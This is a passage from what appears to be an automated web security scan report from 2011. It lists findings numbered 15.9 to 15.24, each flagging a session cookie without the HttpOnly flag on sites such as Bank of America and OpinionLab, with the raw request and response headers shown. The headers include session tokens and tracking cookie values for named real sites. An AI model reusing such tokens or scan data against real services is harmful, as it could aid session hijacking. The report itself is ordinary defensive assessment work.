15.9. http://learn.bridgefront.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://learn.bridgefront.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=F135E1A487FF7E17C2D48B02FB00CAEA; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34161


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...

15.10. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/military/login.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:25:55 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000ypPn6NjbViQ1Q6CVbHfcliE:13393tt7e; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 12807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META H
...[SNIP]...

15.11. https://secure.opinionlab.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSARBAA=IDMHJNCDAGKPHFPBJELDADJB; path=/
Date: Tue, 26 Apr 2011 12:45:31 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>OnlineOpinion</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1252">
<STYLE>
<!--
.main {FONT-FAMILY: Arial, Helvetica, Sans-serif; FONT-SIZE: 10
...[SNIP]...

15.12. https://secure.opinionlab.com/ccc01/comment_card_d.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_d.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_d.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=MFMHJNCDOEKIPAJALGIFIFEG; path=/
Date: Tue, 26 Apr 2011 12:45:42 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

15.13. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8179
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=ICKHJNCDOCHODDPLMDGOHIIG; path=/
Date: Tue, 26 Apr 2011 12:41:00 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

15.14. http://shots.snap.com/rk.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /rk.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&fl=null&size=320x79 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:46 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780966; expires=Wed, 24-Apr-2013 01:22:46 GMT; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1; path=/; domain=.snap.com
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 10269

<html>
<head>


<style>


body {
margin: 0;
padding: 0;
background: #f2f2f2 url('http://i.ixnp.com/images/hdr-spons.gif') no-repeat fixed 97% 94%;

border: 0;
}

#keywordTable {
fon
...[SNIP]...

15.15. http://sofa.bankofamerica.com/eluminate  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 12:26:03 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=30051303820763234856763; path=/; expires=Sat, 25 Apr 2026 12:26:03 GMT
Set-Cookie: TestSess3=30051303820763234856763;path=/
Location: http://data.coremetrics.com/cm?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cmig=y
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


15.16. https://support.sentrigo.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.sentrigo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.1.10.1303780499

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=anqbi8c98lhrc9t5dv43unlak6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4223
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script language="JavaScri
...[SNIP]...

15.17. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.saintcorporation.com/products/saas/webSaintPro.html%3Fgclid%3DCKeR3cTsuKgCFUNd5Qod6WW7Cw&i=12097 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.saintcorporation.com/products/saas/webSaintPro.html?gclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fcompany%2Fcritical%2Dwatch%2Dsecurity%2Easpx

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 23:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Esaintcorporation%2Ecom%2Fproducts%2Fsaas%2FwebSaintPro%2Ehtml%3Fgclid%3DCKeR3cTsuKgCFUNd5Qod6WW7Cw; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSATDRRCT=FIMLPLICBBKFBAJDECCDADGJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

15.18. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.abaca.com/&i=11495 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.abaca.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Date: Tue, 26 Apr 2011 13:54:43 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eabaca%2Ecom%2F; expires=Wed, 27-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSARASQCS=GNKIKHFDAOEGAIFCAEJJJKIG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

15.19. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:42:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=GEADHBADIKBEHFGIANJELJKN; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:43:58 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...

15.20. http://www.backbonesecurity.com/interior.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backbonesecurity.com
Path:   /interior.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /interior.cfm?itemCategory=39808&siteid=418&priorId=0 HTTP/1.1
Host: www.backbonesecurity.com
Proxy-Connection: keep-alive
Referer: http://www.onestoppciscan.com/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 23:43:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=40337214;path=/
Set-Cookie: CFTOKEN=65706353;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type="text/javascript" src="http://beta.asoundst
...[SNIP]...

15.21. http://www.bankofamerica.com/weblinking/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /weblinking/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weblinking/?referredby=futurescholar HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:45 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com
Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=132569127; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=43ca698%2D000c2069%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=2; path=/;
Content-Length: 12150


                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

15.22. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:22:51 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:22:51 GMT
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000rarhzzt74SRcLv3FkL64au2:15pp20g5d; Path=/
Set-Cookie: BOA_0020=20110426:0:O:49008707-c17e-4746-931599acf898a369; Expires=Sat, 26 Apr 2031 12:23:11 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47814


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

15.23. https://www.bankofamerica.com/Control.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Control.do?body=where_passcode_popup HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:47:04 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000F4yK4l84__JtyAFjxBtSMXQ:12rfueih8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description
...[SNIP]...

15.24. https://www.bankofamerica.com/ProcessUser.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /ProcessUser.do

Issue detail

